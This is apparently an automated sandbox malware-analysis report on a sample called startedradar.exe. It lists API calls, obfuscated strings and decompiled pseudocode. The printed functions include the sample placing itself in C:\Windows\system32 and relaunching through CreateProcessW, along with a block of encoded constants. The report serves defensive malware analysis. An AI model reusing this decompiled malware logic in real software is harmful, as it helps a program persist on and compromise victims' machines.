0x002a5fb8
0x002a5fb8
0x002a5fba
0x002a5fbd
0x002a5fc2
0x002a5fc2
0x002a5fed
0x002a5fed
0x002a5fef
0x002a5ff1
0x002a5ff4
0x002a5ffa
0x002a600c
0x002a600c
0x002a601c
0x002a601c
0x002a6023
0x002a6026
0x002a6028
0x002a6050
0x002a605e
0x002a6061
0x002a6068
0x002a606b
0x002a606d
0x002a6071
0x002a6074
0x002a6077
0x002a6083
0x002a6083
0x002a6079
0x002a6079
0x002a6079
0x002a6085
0x002a6090
0x002a6099
0x002a609c
0x002a609e
0x002a5ed3
0x002a5ed3
0x00000000
0x002a602a
0x002a602a
0x002a602a
0x002a602a
0x002a602d
0x00000000
0x00000000
0x002a6033
0x002a6038
0x002a603a
0x002a603b
0x002a603e
0x002a6040
0x002a6043
0x002a6046
0x002a6049
0x002a604b
0x00000000
0x002a604d
0x002a604d
0x002a604d
0x00000000
0x002a604d
0x00000000
0x002a604b
0x002a62a6
0x002a62a6
0x00000000
0x002a62a6
0x002a600e
0x002a600e
0x002a600e
0x002a6011
0x002a6013
0x002a6388
0x002a6388
0x002a638b
0x00000000
0x002a6019
0x002a6019
0x002a6019
0x00000000
0x002a6019
0x002a6013
0x002a5ffc
0x002a5ffc
0x002a5ffc
0x002a5fff
0x002a6006
0x00000000
0x002a6006
0x002a5ef0
0x002a5ef0
0x002a5ef8
0x002a5f7e
0x002a5f7e
0x002a5f85
0x002a5f88
0x002a5f8d
0x002a5f93
0x002a5f96
0x002a5f99
0x002a5f99
0x002a5f9c
0x00000000
0x002a5efe
0x002a5efe
0x002a5efe
0x002a5f00
0x002a5f05
0x002a5f0f
0x002a5f22
0x002a5f22
0x002a5f25
0x00000000
0x002a5f27
0x002a5f27
0x002a5f2c
0x002a5f2c
0x002a5f30
0x002a5f30
0x002a5f3e
0x002a5f49
0x002a5f4a
0x002a5f4d
0x002a5f4f
0x00000000
0x00000000
0x002a5f51
0x002a5f51
0x002a5f54
0x002a5f56
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x002a5f56
0x00000000
0x002a5f30
0x002a5f11
0x002a5f11
0x002a5f11
0x002a5f16
0x002a5f58
0x002a5f58
0x002a5f5b
0x002a5f5e
0x002a629b
0x002a629b
0x00000000
0x00000000
0x00000000
0x00000000
0x002a5f18
0x002a5f18
0x002a5f1a
0x002a5f9f
0x002a5f9f
0x00000000
0x002a5f20
0x002a5f20
0x00000000
0x002a5f20
0x002a5f1a
0x002a5f16
0x00000000
0x002a5f64
0x002a5f67
0x002a5f69
0x002a5f6b
0x002a5f6c
0x002a5f6e
0x002a5f71
0x002a5f74
0x002a5f77
0x00000000
0x002a5f7c
0x002a5ef8
0x00000000
0x002a5eea
0x002a60a6
0x002a60a9
0x002a60ac
0x002a60ae
0x002a60b0
0x002a6396
0x002a6396
0x002a6399
0x00000000
0x002a60b6
0x002a60b6
0x002a60c2
0x002a60d3
0x002a60d3
0x002a60dd
0x002a60e3
0x00000000
0x002a60e3
0x00000000
0x002a60b0
0x002a5ed3
0x002a6376
0x002a6376
0x002a6376
0x002a637d
0x00000000
0x002a637d
0x00000000
0x002a5d51

APIs

memset.NTDLL ref: 002A5A98
memset.NTDLL ref: 002A5C6D
memset.NTDLL ref: 002A5C83
memset.NTDLL ref: 002A5C99

Memory Dump Source

Source File: 00000008.00000002.1686365034.002A1000.00000020.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000008.00000002.1686360890.002A0000.00000004.sdmp Download File
Associated: 00000008.00000002.1686374589.002B1000.00000002.sdmp Download File
Associated: 00000008.00000002.1686378808.002B2000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2a0000_startedradar.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: d121147189308d6ef9edc866b212c81ffeecbc5613d6e7322f3bd1a34048e1b1
Instruction ID: 42facc8523d45c3553fa30ccc1f753be9039de647ec490dd271f1d9c25910110
Opcode Fuzzy Hash: d121147189308d6ef9edc866b212c81ffeecbc5613d6e7322f3bd1a34048e1b1
Instruction Fuzzy Hash: 5D313EB2E10F82EBE3058F64D805BA5B771FFDA300F245306E5D595642EBB8A6A4C7D0

Uniqueness

Uniqueness Score: 0.00%

Analysis Process: startedradar.exe PID: 3444 Parent PID: 3784 startedradar.exeUNIQUE

Execution Graph

Execution Coverage:	6.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	14%
Total number of Nodes:	557
Total number of Limit Nodes:	20

Executed Functions

Function 000F21B8, Relevance: 19.3, APIs: 1, Strings: 10, Instructions: 60
memorynativeCOMMON

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL ref: 000F2261

Strings

Z, xrefs: 000F220D
YYYYYocateVirtuaYMemoYYYYYYYYYYYYYYY, xrefs: 000F21CD
$, xrefs: 000F21E5
w, xrefs: 000F2211
l, xrefs: 000F2221
y, xrefs: 000F2205
A, xrefs: 000F2215
l, xrefs: 000F221D
l, xrefs: 000F2219
r, xrefs: 000F2201

Memory Dump Source

Source File: 00000009.00000002.1910243505.000F0000.00000040.sdmp, Offset: 000F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_f0000_startedradar.jbxd

Similarity

API ID: AllocateMemoryVirtual
String ID: $$A$YYYYYocateVirtuaYMemoYYYYYYYYYYYYYYY$Z$l$l$l$r$w$y
API String ID: 2167126740-65669930
Opcode ID: b1ab00398fd01d4831b46376ca981abc8bf799d76fe64f98588500c985ffefe1
Instruction ID: 1d56381279aa5056d3e8460a3336076cb24ef3084560d67ecb54cb53c6a78067
Opcode Fuzzy Hash: b1ab00398fd01d4831b46376ca981abc8bf799d76fe64f98588500c985ffefe1
Instruction Fuzzy Hash: AC2119B0D08388DFDB00DFA8D48469EBFF1AF85314F10851EE998AB351C3B99549CB92

Uniqueness

Uniqueness Score: 3.75%

Function 0011CF86, Relevance: 13.5, APIs: 9, Instructions: 37
windowsynchronizationtimeCOMMON

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 0011CF86
SetTimer.USER32(?,00000000), ref: 0011CF8E
GetTickCount.KERNEL32(?,00000000), ref: 0011CF94
GetTickCount.KERNEL32(?,00000000), ref: 0011CFA5
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0011CFCB
TranslateMessage.USER32(?), ref: 0011CFD9
DispatchMessageW.USER32(?), ref: 0011CFE3
WaitForSingleObject.KERNEL32(00000000), ref: 0011CFF1
DestroyWindow.USER32 ref: 0011D013

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: CountMessageTick$DestroyDispatchObjectSingleTimerTranslateWaitWindow
String ID:
API String ID: 1391006589-0
Opcode ID: eb01a8ef392d562da9946ad624edefd129ae4708a26d49bff09d7d284efaec23
Instruction ID: b7d2ee3d5e264ff209071c3be90d2d456332edc77bced38ce6dc179bdb8656b7
Opcode Fuzzy Hash: eb01a8ef392d562da9946ad624edefd129ae4708a26d49bff09d7d284efaec23
Instruction Fuzzy Hash: 22011971900200FBD7245BB4EC8EBAE3B7AEB04706F504024F202D69E0DB7884A39B54

Uniqueness

Uniqueness Score: 0.03%

Function 000F20FD, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 61
nativeCOMMON

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 000F21A2

Strings

yyProtectairtual emory, xrefs: 000F2112
V, xrefs: 000F214E
w, xrefs: 000F214A
@, xrefs: 000F212A
M, xrefs: 000F2152
Z, xrefs: 000F2146

Memory Dump Source

Source File: 00000009.00000002.1910243505.000F0000.00000040.sdmp, Offset: 000F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_f0000_startedradar.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID: @$M$V$Z$w$yyProtectairtual emory
API String ID: 2706961497-3039725267
Opcode ID: be8e83489f5f0157cd404c5ea5f4a9d028123f043dc6ca77557c268db100e54c
Instruction ID: 12fb32f8cd67951d520cd7f181bf296127843eb288fc9f7ad864898605252f43
Opcode Fuzzy Hash: be8e83489f5f0157cd404c5ea5f4a9d028123f043dc6ca77557c268db100e54c
Instruction Fuzzy Hash: 6A21F2B0D083489FDB00DFA8C48069EBBF4EB48354F10892AE959AB391D3759A49CF51

Uniqueness

Uniqueness Score: 3.75%

Function 00112104, Relevance: 3.0, APIs: 2, Instructions: 21encryptionCOMMON

APIs

CryptDecodeObjectEx.CRYPT32 ref: 0011210D
CryptReleaseContext.ADVAPI32(00000000), ref: 00112147

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: Crypt$ContextDecodeObjectRelease
String ID:
API String ID: 580087945-0
Opcode ID: cc5e22e2e8fe418ffad484e7c70462d819d0465766a3b176b4eddaf174c82210
Instruction ID: 00ab4f0732c440c4702a938c0454364eb9f1bb2b3a9da6034be92bedba6e0900
Opcode Fuzzy Hash: cc5e22e2e8fe418ffad484e7c70462d819d0465766a3b176b4eddaf174c82210
Instruction Fuzzy Hash: 31C08C3034A016BFDA342F64BD097663759E705B63F100466FA4AE2DA0DF22D8F19AC5

Uniqueness

Uniqueness Score: 0.04%

Function 001120E5, Relevance: 1.5, APIs: 1, Instructions: 11encryptionCOMMON

APIs

CryptAcquireContextW.ADVAPI32 ref: 001120E7

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: AcquireContextCrypt
String ID:
API String ID: 3951991833-0
Opcode ID: 7817e16667d693a6306b281b06a8a69450ed0e167c8edda8d1ed29b08998ffd4
Instruction ID: 19fb875faf412c12cea2d2b0980c01095418cd92ab08ca8782cccc2685a438b9
Opcode Fuzzy Hash: 7817e16667d693a6306b281b06a8a69450ed0e167c8edda8d1ed29b08998ffd4
Instruction Fuzzy Hash: B3B0923530601A9759285AA939052B772489605AD6B1045A6AA0EC6E60EA11C8B04EC2

Uniqueness

Uniqueness Score: 0.03%

Function 0011CEB7, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58
memoryregistryCOMMON

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 32%

			E0011CEB7(void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				int _t28;
				struct HWND__* _t31;
				signed int _t34;
				long _t36;
				struct HWND__* _t54;
				void* _t56;
				void* _t58;

				asm("popfd");
				asm("int3");
				_t56 = L00111D00(__ecx, __edx, __edi);
				 *0x1259dc(_t58 - 0xd0, 0x40, _t56,  *0x125a04);
				HeapFree(GetProcessHeap(), 0, _t56);
				memset(_t58 - 0x30, 0, 0x30);
				 *(_t58 - 0x30) = 0x30;
				 *((intOrPtr*)(_t58 - 0x10)) = 1;
				 *((intOrPtr*)(_t58 - 8)) = _t58 - 0xd0;
				 *((intOrPtr*)(_t58 - 0x28)) = E0011CE70;
				 *((intOrPtr*)(_t58 - 0x1c)) = GetModuleHandleW(0);
				_t28 = RegisterClassExW(_t58 - 0x30);
				if(_t28 != 0) {
					_t31 = CreateWindowExW(0, _t58 - 0xd0, 0, 0xcf0000, 0x80000000, 0x80000000, 0x80000000, 0x80000000, 0, 0, GetModuleHandleW(0), 0); // executed
					_t54 = _t31;
					if(_t54 != 0) {
						goto 0x301990;
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						SetTimer(_t54, GetTickCount(), ??, ??); // executed
						_t34 = GetTickCount();
						_t36 = GetTickCount();
						 *0x127c98 = 1;
						 *0x127c94 = _t36 + 0xbb8 + _t34 % 0xbb8;
						if(GetMessageW(_t58 - 0x4c, 0, 0, 0) > 0) {
							while(1) {
								TranslateMessage(_t58 - 0x4c);
								DispatchMessageW(_t58 - 0x4c); // executed
								if(WaitForSingleObject( *0x124c0c, 0) != 0x102) {
									goto L7;
								}
								goto 0x3019a8;
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								if(GetMessageW() > 0) {
									continue;
								}
								goto L7;
							}
						}
						L7:
						DestroyWindow(_t54);
					}
					goto 0x3019c0;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_t28 = UnregisterClassW();
				}
				goto 0x3019d7;
				return _t28;
			}

APIs

_snwprintf.NTDLL ref: 0011CED3
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0011CEDF
HeapFree.KERNEL32(00000000), ref: 0011CEE6
memset.NTDLL ref: 0011CEF4
GetModuleHandleW.KERNEL32(00000000), ref: 0011CF1D
RegisterClassExW.USER32(00000030), ref: 0011CF2A
GetModuleHandleW.KERNEL32(00000000,00000000), ref: 0011CF3D
CreateWindowExW.USER32(00000000,?,00000000,00CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00000000), ref: 0011CF6C

Strings

0, xrefs: 0011CEFD

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: HandleHeapModule$ClassCreateFreeProcessRegisterWindow_snwprintfmemset
String ID: 0
API String ID: 2844751603-4108050209
Opcode ID: 7e18e58572d26d4e489f34dc25e2de5cb94bd188c3e198567d2e1b08d23b3bdc
Instruction ID: 412787cff791e93ee6d415a404869b6a267be2722469701bd789631b9ee648ca
Opcode Fuzzy Hash: 7e18e58572d26d4e489f34dc25e2de5cb94bd188c3e198567d2e1b08d23b3bdc
Instruction Fuzzy Hash: 7B115E75941604FBEB319BE0AC4AFAD7A78FB04746F240025F709B65C0D77061A5CBAA

Uniqueness

Uniqueness Score: 7.75%

Function 001124B6, Relevance: 15.1, APIs: 10, Instructions: 102
memorystringCOMMON

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 36%

			E001124B6(int __ecx) {
				long* _t25;
				short* _t29;
				void* _t30;
				int _t46;
				int _t48;
				void* _t50;
				void* _t51;
				long* _t55;
				int _t59;
				signed int _t61;
				void* _t63;
				void* _t65;
				long _t66;
				WCHAR* _t68;
				void* _t69;

				 *(_t69 - 8) = 0;
				_t48 = 0;
				 *(_t69 - 0xc) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0;
				_t25 = __ecx + 4;
				_t59 = 0;
				 *(_t69 - 0x10) = _t25;
				 *_t25 = 0; // executed
				L00111BE0(0x112410, _t69 - 8); // executed
				_t63 =  *(_t69 - 8);
				while(_t63 != 0) {
					_t6 = _t63 + 4; // 0x4
					_t46 = lstrlenW(_t6);
					_t63 =  *_t63;
					_t48 = _t48 + 1 + _t46;
				}
				_t29 = RtlAllocateHeap(GetProcessHeap(), 8, _t48 + _t48);
				 *(_t69 - 4) = _t29;
				if(_t29 == 0) {
					_t59 =  *(_t69 - 0xc);
				} else {
					_t50 =  *(_t69 - 8);
					while(_t50 != 0) {
						_t10 = _t50 + 4; // 0x4
						_t68 = _t10;
						lstrcpyW( &(_t29[_t59]), _t68);
						_t61 = _t59 + lstrlenW(_t68);
						_t29 =  *(_t69 - 4);
						_t29[_t61] = 0x2c;
						_t59 = _t61 + 1;
						_t50 =  *_t50;
					}
					_t51 = 0;
					_t66 = WideCharToMultiByte(0xfde9, 0, _t29, _t59, 0, 0, 0, 0);
					 *(_t69 - 0x14) = _t66;
					if(_t66 != 0) {
						_t51 = RtlAllocateHeap(GetProcessHeap(), 8, _t66);
						if(_t51 == 0) {
							goto L11;
						} else {
							goto 0x300916;
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							WideCharToMultiByte();
							_t55 =  *(_t69 - 0x10);
							if(_t55 != 0) {
								 *_t55 =  *(_t69 - 0x14);
							}
						}
					}
					goto 0x300936;
					asm("int3");
					 *_t59 = _t51;
					HeapFree(GetProcessHeap(), ??, ??);
				}
				_t30 =  *(_t69 - 8);
				if(_t30 != 0) {
					do {
						_t65 =  *_t30;
						HeapFree(GetProcessHeap(), 0, _t30);
						_t30 = _t65;
					} while (_t65 != 0);
				}
				return 0 |  *_t59 != 0x00000000;
			}

APIs

lstrlenW.KERNEL32(00000004), ref: 001124F4
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00112509
RtlAllocateHeap.NTDLL(00000000), ref: 00112510
lstrcpyW.KERNEL32(00000000,00000004), ref: 00112530
lstrlenW.KERNEL32(00000004), ref: 00112537
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00112560
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00112572
RtlAllocateHeap.NTDLL(00000000), ref: 00112579
GetProcessHeap.KERNEL32(00000000,00000000), ref: 001125D5
HeapFree.KERNEL32(00000000), ref: 001125DC

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: Heap$Process$Allocatelstrlen$ByteCharFreeMultiWidelstrcpy
String ID:
API String ID: 3825671978-0
Opcode ID: 07fb82833de783f28fc4fb89029e07e193a6dfe033b14edd92c941cb9fc977a5
Instruction ID: 299752dde5302d96ba276d763db2e3847a9bd6f63e7ae12dced34394571cc50f
Opcode Fuzzy Hash: 07fb82833de783f28fc4fb89029e07e193a6dfe033b14edd92c941cb9fc977a5
Instruction Fuzzy Hash: EA318A72A01315EFDB208FE4DCC8AAEB7BDEF48745B050475E901EB650DB309DA18BA0

Uniqueness

Uniqueness Score: 1.85%

Function 0011FEEF, Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 45
memorystringUNIQUE

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 52%

			E0011FEEF(void* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t13;
				int _t16;
				int _t21;
				void* _t25;
				void* _t30;
				void* _t32;
				void* _t35;
				void* _t44;

				_t44 = __eflags;
				_t30 = __edi;
				_t25 = __ecx;
				asm("popfd");
				asm("int3");
				memset(??, ??, ??);
				GetModuleFileNameW(0, "C:\Windows\system32\startedradar.exe", 0x104);
				_push(_t25);
				_t32 = L00111C60(0x124360, 0x2f8, __esi);
				_t29 = _t32;
				L0011F610(0x127cd0, _t32);
				E0011F6F0(HeapFree(GetProcessHeap(), 0, _t32), _t32, _t30, _t32);
				_t13 = L0011F870(); // executed
				L0011F900(_t13, _t32); // executed
				L0011F770(0x127cd0, _t32, _t32, _t44); // executed
				_t16 = lstrcmpiW("C:\Windows\system32\startedradar.exe", "C:\Windows\system32\startedradar.exe");
				if(_t16 != 0) {
					L0011FB80(0x127cd0);
					__eflags =  *0x1263cc;
					if( *0x1263cc == 0) {
						goto 0x301ede;
						asm("int3");
						asm("int3");
						asm("int3");
						memset();
						 *(_t35 - 0x58) = 0x44;
						_t21 = CreateProcessW("C:\Windows\system32\startedradar.exe", 0, 0, 0, 0, 0, 0, 0, _t35 - 0x58, _t35 - 0x10);
						__eflags = _t21;
						if(_t21 != 0) {
							CloseHandle( *(_t35 - 0x10));
							_t21 = CloseHandle( *(_t35 - 0xc));
						}
						goto 0x301ef4;
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						return _t21;
					} else {
						L0011FD90(0x127cd0, _t29, _t32);
						return 1;
					}
				} else {
					return _t16;
				}
			}

APIs

memset.NTDLL ref: 0011FEF1
GetModuleFileNameW.KERNEL32(00000000,C:\Windows\system32\startedradar.exe,00000104), ref: 0011FF06
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0011FF30
HeapFree.KERNEL32(00000000), ref: 0011FF37
lstrcmpiW.KERNEL32(C:\Windows\system32\startedradar.exe,C:\Windows\system32\startedradar.exe), ref: 0011FF5B

Strings

C:\Windows\system32\startedradar.exe, xrefs: 0011FF51
startedradar, xrefs: 0011FF23
C:\Windows\system32\startedradar.exe, xrefs: 0011FEFF, 0011FF56

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: Heap$FileFreeModuleNameProcesslstrcmpimemset
String ID: C:\Windows\system32\startedradar.exe$C:\Windows\system32\startedradar.exe$startedradar
API String ID: 1471024059-1908662769
Opcode ID: 100b2deb62b27072943a1e00a3f42f46ca9618917a18dad08d93df3176d1c675
Instruction ID: f6a586c180f9ee9e45f323c8d8df51977cf02ea2285e60310ae02e16fa673e67
Opcode Fuzzy Hash: 100b2deb62b27072943a1e00a3f42f46ca9618917a18dad08d93df3176d1c675
Instruction Fuzzy Hash: FBF0D131244115B7C62877F4BC0F3AA3244AB64756F000438F50D955D1DFA144F386A6

Uniqueness

Uniqueness Score: 100.00%

Function 0011843A, Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 195
memorylibraryUNIQUE

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E0011843A(void* __esi, void* __eflags) {
				struct HINSTANCE__* _t178;
				int _t180;
				void* _t182;
				struct HINSTANCE__* _t184;
				void* _t187;
				void* _t189;
				void* _t190;
				void* _t191;

				 *((intOrPtr*)(_t191 - 0x2bc)) = 0xffb6f3db;
				 *((intOrPtr*)(_t191 - 0x2b8)) = 0x42ee5917;
				 *((intOrPtr*)(_t191 - 0x2b4)) = 0xcb3b48c1;
				 *((intOrPtr*)(_t191 - 0x2b0)) = 0xa6520082;
				 *((intOrPtr*)(_t191 - 0x2ac)) = 0x5978cda3;
				 *((intOrPtr*)(_t191 - 0x2a8)) = 0x8eeb0cef;
				 *((intOrPtr*)(_t191 - 0x2a4)) = 0x7c3c2616;
				 *((intOrPtr*)(_t191 - 0x2a0)) = 0xf9e12a7d;
				 *((intOrPtr*)(_t191 - 0x29c)) = 0xd1129a86;
				 *((intOrPtr*)(_t191 - 0x298)) = 0x19026469;
				 *((intOrPtr*)(_t191 - 0x294)) = 0x81808771;
				 *((intOrPtr*)(_t191 - 0x290)) = 0xb80a64b0;
				 *((intOrPtr*)(_t191 - 0x28c)) = 0x567d0021;
				 *((intOrPtr*)(_t191 - 0x288)) = 0x84daafe4;
				 *((intOrPtr*)(_t191 - 0x284)) = 0x52328f;
				 *((intOrPtr*)(_t191 - 0x280)) = 0x79c5bc63;
				 *((intOrPtr*)(_t191 - 0x27c)) = 0x18ee37f2;
				 *((intOrPtr*)(_t191 - 0x278)) = 0x759352e0;
				 *((intOrPtr*)(_t191 - 0x274)) = 0x972b7044;
				 *((intOrPtr*)(_t191 - 0x270)) = 0xb36a66b1;
				 *((intOrPtr*)(_t191 - 0x26c)) = 0x2522e1d5;
				 *((intOrPtr*)(_t191 - 0x268)) = 0xcaea6a5e;
				 *((intOrPtr*)(_t191 - 0x264)) = 0xaec4e5b9;
				 *((intOrPtr*)(_t191 - 0x260)) = 0x8a5f01fa;
				 *((intOrPtr*)(_t191 - 0x25c)) = 0xbb77f3f7;
				 *((intOrPtr*)(_t191 - 0x258)) = 0x50f1bf85;
				 *((intOrPtr*)(_t191 - 0x254)) = 0xe281bbb7;
				 *((intOrPtr*)(_t191 - 0x250)) = 0x998865c4;
				 *((intOrPtr*)(_t191 - 0x24c)) = 0x62370433;
				 *((intOrPtr*)(_t191 - 0x248)) = 0xa291a2b3;
				 *((intOrPtr*)(_t191 - 0x244)) = 0xbba8d9cf;
				 *((intOrPtr*)(_t191 - 0x240)) = 0x91a70b;
				 *((intOrPtr*)(_t191 - 0x23c)) = 0x9c03d728;
				 *((intOrPtr*)(_t191 - 0x238)) = 0x847a151e;
				 *((intOrPtr*)(_t191 - 0x234)) = 0x2304bff;
				 *((intOrPtr*)(_t191 - 0x230)) = 0xbed58740;
				 *((intOrPtr*)(_t191 - 0x22c)) = 0x1c2240c7;
				 *((intOrPtr*)(_t191 - 0x228)) = 0x12d0bb03;
				 *((intOrPtr*)(_t191 - 0x224)) = 0xe98e44a1;
				 *((intOrPtr*)(_t191 - 0x220)) = 0x7a77d8c4;
				 *((intOrPtr*)(_t191 - 0x21c)) = 0xdcd3285e;
				 *((intOrPtr*)(_t191 - 0x218)) = 0xe0b58a70;
				 *((intOrPtr*)(_t191 - 0x214)) = 0xaf855e10;
				 *((intOrPtr*)(_t191 - 0x210)) = 0x368de6d9;
				 *((intOrPtr*)(_t191 - 0x20c)) = 0x40b905fa;
				 *((intOrPtr*)(_t191 - 0x208)) = 0x74f97d88;
				 *((intOrPtr*)(_t191 - 0x204)) = 0x55b6dcc6;
				 *((intOrPtr*)(_t191 - 0x200)) = 0xb1cc33f;
				 *((intOrPtr*)(_t191 - 0x1fc)) = 0xc3456997;
				 *((intOrPtr*)(_t191 - 0x1f8)) = 0xdd35737e;
				 *((intOrPtr*)(_t191 - 0x1f4)) = 0xb36b92a9;
				 *((intOrPtr*)(_t191 - 0x1f0)) = 0xde8e79a1;
				 *((intOrPtr*)(_t191 - 0x1ec)) = 0xf23453a2;
				 *((intOrPtr*)(_t191 - 0x1e8)) = 0xaaf7674b;
				 *((intOrPtr*)(_t191 - 0x1e4)) = 0x3fd813b0;
				 *((intOrPtr*)(_t191 - 0x1e0)) = 0x60beee96;
				 *((intOrPtr*)(_t191 - 0x1dc)) = 0x9781008e;
				 *((intOrPtr*)(_t191 - 0x1d8)) = 0x4aa3e6d3;
				 *((intOrPtr*)(_t191 - 0x1d4)) = 0x16cff405;
				 *((intOrPtr*)(_t191 - 0x1d0)) = 0xc7cd086c;
				 *((intOrPtr*)(_t191 - 0x1cc)) = 0x7fa1c49;
				 *((intOrPtr*)(_t191 - 0x1c8)) = 0xf2da8f0b;
				 *((intOrPtr*)(_t191 - 0x1c4)) = 0x5a45cf8b;
				 *((intOrPtr*)(_t191 - 0x1c0)) = 0x3a9cda52;
				 *((intOrPtr*)(_t191 - 0x1bc)) = 0x320d7194;
				 *((intOrPtr*)(_t191 - 0x1b8)) = 0x5736192c;
				 *((intOrPtr*)(_t191 - 0x1b4)) = 0xd8ce2db8;
				 *((intOrPtr*)(_t191 - 0x1b0)) = 0x1de4ee69;
				 *((intOrPtr*)(_t191 - 0x1ac)) = 0xe8ae66c8;
				 *((intOrPtr*)(_t191 - 0x1a8)) = 0x2c44325f;
				 *((intOrPtr*)(_t191 - 0x1a4)) = 0xed6ce4a8;
				 *((intOrPtr*)(_t191 - 0x1a0)) = 0x82bd0342;
				 *((intOrPtr*)(_t191 - 0x19c)) = 0x225078dd;
				 *((intOrPtr*)(_t191 - 0x198)) = 0x69abbb87;
				 *((intOrPtr*)(_t191 - 0x194)) = 0xa9d4ed32;
				 *((intOrPtr*)(_t191 - 0x190)) = 0x8050fb55;
				 *((intOrPtr*)(_t191 - 0x18c)) = 0x39db400e;
				 *((intOrPtr*)(_t191 - 0x188)) = 0x11b86bf1;
				 *((intOrPtr*)(_t191 - 0x184)) = 0xff2e0d55;
				 *((intOrPtr*)(_t191 - 0x180)) = 0x905b27a0;
				 *((intOrPtr*)(_t191 - 0x17c)) = 0xa6cc43d0;
				 *((intOrPtr*)(_t191 - 0x178)) = 0x248399f0;
				 *((intOrPtr*)(_t191 - 0x174)) = 0x61fdc396;
				 *((intOrPtr*)(_t191 - 0x170)) = 0x55d41932;
				 *((intOrPtr*)(_t191 - 0x16c)) = 0x3cb6d6d2;
				 *((intOrPtr*)(_t191 - 0x168)) = 0x602f81fc;
				 *((intOrPtr*)(_t191 - 0x164)) = 0x96fe0e2a;
				 *((intOrPtr*)(_t191 - 0x160)) = 0xadb4daa8;
				 *((intOrPtr*)(_t191 - 0x15c)) = 0x4ba1d5c1;
				 *((intOrPtr*)(_t191 - 0x158)) = 0xaeb36b38;
				 *((intOrPtr*)(_t191 - 0x154)) = 0x94d0b9c4;
				 *((intOrPtr*)(_t191 - 0x150)) = 0x442d53bf;
				 *((intOrPtr*)(_t191 - 0x14c)) = 0x3293833a;
				 *((intOrPtr*)(_t191 - 0x148)) = 0xb37bca59;
				 *((intOrPtr*)(_t191 - 0x144)) = 0x8c41f99d;
				 *((intOrPtr*)(_t191 - 0x140)) = 0x7af39d97;
